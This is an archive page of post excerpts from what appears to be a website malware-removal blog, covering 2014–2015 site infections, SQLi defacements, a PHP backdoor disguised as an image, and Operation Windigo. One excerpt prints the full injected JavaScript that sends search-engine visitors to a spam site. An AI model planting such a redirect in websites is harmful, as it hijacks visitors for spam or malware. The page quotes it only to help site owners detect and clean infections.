Tips and Information Archives – Website Malware Removal Service

Security News and Information

Category: Tips and Information

VisitorTracker Malware – way beyond just JavaScript files

Posted by MalRemServ on 26 09 2015. 1 Comment

Over the past couple of weeks, we’ve seen a fairly new malware show up in sites. It doesn’t appear to be specific to any one type of CMS or website, which would point to some type of ‘other’ vulnerability such as a compromised FTP, cPanel or other unknown issue. We…

Have you been Hacked by Hwins2005 ?

Posted by MalRemServ on 27 08 2015. 0 Comments

When you visit your site, do you automatically see “Hacked by Hwins2005”? If so, you’ve been hacked. This type of hack is a SQLi, and we will walk you through the basic way to detect it and how to fix it. First, if you see this on your site, do a view…

“This Site May be Hacked” – increase in detections

Posted by MalRemServ on 16 02 2015. 1 Comment

Today we’ve seen an increase in websites that Google has labeled with “This Site May be Hacked”. Apparently it looks like a change in the way they detect and label these sites. It is important to note that this label is completely different than the dreaded blocked “malware warning”. Google displays…

WordPress soaksoak{.}ru – something new?

Posted by MalRemServ on 15 12 2014. 0 Comments

Today we came across several WordPress sites with something we hadn’t come across yet. It was hidden quite well in the wp-includes directory. They used the template-loader.php file to load up wp-includes/swfobject.js which had the following nasty bit in it, which then redirected users to soaksoak[.]ru:…

How to scan an HTTP password protected area

Posted by Nicholas Sciberras on 29 10 2014. 0 Comments

There are 2 types of password protected areas: HTTP Password protected areas: These are generally managed by the web server, and the user is prompted with a password dialog. Form-based restricted areas: This type of authentication is handled by the web application. The credentials are requested using a web form.…

Common Network Security Assessment Oversights

Posted by Kevin Beaver on 28 07 2014. 0 Comments

Network security assessments are one of the most critical exercises performed for minimizing business risks. Your time is limited. You’ve got pressure from management to get things done. There’s so much to do and not enough time to do it.…

Making Web Security Part of your IT Governance Program

Posted by Kevin Beaver on 23 07 2014. 0 Comments

Moving past IT compliance, IT “governance” is becoming the new area of focus in enterprises today. With compliance often being a more tactical business function, IT governance tends to operate at a higher level, especially in larger organizations. Internal audit,…

sneaky social.png is not your friend – it contains malware!

Posted by MalRemServ on 15 04 2014. 1 Comment

Over the past week we came across a couple instances of interesting malware that was not easily detected. We called it the sneaky social.png. It’s not really an image – if you were to open it up with a text editor, you would more than likely see this: <?php…

Website Redirects using document.referrer

Posted by MalRemServ on 15 04 2014. 0 Comments

Towards the beginning of the year we saw several spam hacks that used an injected JavaScript redirect; it typically looks like the following:

var s=document.referrer; if(s.indexOf("google")>0 || s.indexOf("bing")>0 || s.indexOf("yahoo")>0 || s.indexOf("aol")>0){ self.location='http://targetsite[.]com'; }

When it appears on Windows based servers (which is…

Server hit with Operation Windigo?

Posted by MalRemServ on 20 03 2014. 0 Comments

The researchers at ESET discovered that approximately 25,000 Unix/Linux servers were hijacked by a backdoor trojan. They have provided a detailed technical overview which you can download from their site. How do you know if you’ve been affected by this? You can run the following command: $ ssh -G 2>&1 |…